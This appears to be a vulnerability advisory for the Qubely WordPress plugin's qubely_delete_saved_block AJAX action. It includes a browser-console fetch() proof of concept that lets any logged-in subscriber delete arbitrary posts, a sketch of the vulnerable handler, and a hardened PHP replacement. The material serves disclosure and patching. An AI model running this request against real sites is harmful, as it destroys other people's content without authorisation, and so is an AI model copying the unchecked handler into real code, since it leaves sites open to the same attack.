The plugin does not perform an authorisation check or a CSRF (nonce) check on the qubely_delete_saved_block AJAX action, and does not verify that the block to be deleted belongs to the plugin. As a result, any authenticated user, such as a subscriber, can delete arbitrary posts by supplying their ID. Note: v1.7.7 added a capability check; the CSRF check was added in v1.7.8.
// Proof of concept: run from the browser console while logged in as any user (e.g. a subscriber).
// Replace the host and block_id with the target site and the ID of the post to delete.
fetch("https://example.com/wp-admin/admin-ajax.php", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    // No nonce is sent: the vulnerable version does not require one,
    // and block_id can be the ID of any post, not only a plugin block.
    "body": "action=qubely_delete_saved_block&block_id=1",
    "method": "POST",
    // Sends the logged-in user's cookies with the request.
    "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
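The three missing checks described above, shown as an added example of a hardened WordPress AJAX handler. This is illustrative code written for this page, not Qubely's own code: the post type name (QUBELY_EXAMPLE_BLOCK_TYPE), the nonce action name and the nonce field name (security) are assumptions, and the vulnerable handler is only a sketch of the pattern the advisory describes.

```php
<?php
// Assumed name for the plugin's saved-block post type (placeholder, not Qubely's real value).
const QUBELY_EXAMPLE_BLOCK_TYPE = 'qubely_example_block';

// --- Vulnerable pattern (sketch of what the advisory describes) ---
// Any logged-in user can reach wp_ajax_* handlers; nothing here checks a nonce,
// a capability, or whether the post is one of the plugin's blocks.
function qubely_example_delete_block_vulnerable() {
    $block_id = isset($_POST['block_id']) ? (int) $_POST['block_id'] : 0;
    wp_delete_post($block_id, true);   // deletes ANY post, e.g. a published page
    wp_send_json_success();
}

// --- Hardened handler ---
function qubely_example_delete_block_hardened() {
    // 1. CSRF: require a nonce created with wp_create_nonce('qubely_delete_saved_block')
    //    and sent in the 'security' POST field. On failure this dies with a 403 for AJAX requests.
    check_ajax_referer('qubely_delete_saved_block', 'security');

    $block_id = isset($_POST['block_id']) ? absint($_POST['block_id']) : 0;
    if ($block_id === 0) {
        wp_send_json_error(array('message' => 'Missing block_id'), 400);
    }

    // 2. Ownership: refuse anything that is not one of the plugin's own block posts,
    //    so the action cannot be turned against arbitrary posts/pages.
    if (get_post_type($block_id) !== QUBELY_EXAMPLE_BLOCK_TYPE) {
        wp_send_json_error(array('message' => 'Not a saved block'), 403);
    }

    // 3. Authorisation: check the meta capability for THIS post, not a generic
    //    is_user_logged_in(). WordPress maps delete_post to delete_posts /
    //    delete_others_posts according to the post's author and type.
    if (!current_user_can('delete_post', $block_id)) {
        wp_send_json_error(array('message' => 'Insufficient permissions'), 403);
    }

    if (!wp_delete_post($block_id, true)) {
        wp_send_json_error(array('message' => 'Delete failed'), 500);
    }
    wp_send_json_success(array('deleted' => $block_id));
}

// Register only the hardened handler; the vulnerable one is shown for comparison.
add_action('wp_ajax_qubely_delete_saved_block', 'qubely_example_delete_block_hardened');
// The nonce is passed to the editor script with wp_localize_script(), e.g.
// array('deleteNonce' => wp_create_nonce('qubely_delete_saved_block')),
// and the client adds '&security=<nonce>' to the POST body shown in the PoC above.
```

With this handler in place, the PoC above fails at step 1 (no nonce), and a request that includes a valid nonce but targets a post outside the plugin's post type, or a block the user has no right to delete, is rejected at steps 2 and 3. Ordering the nonce check first keeps unauthenticated-style probing from reaching the database at all.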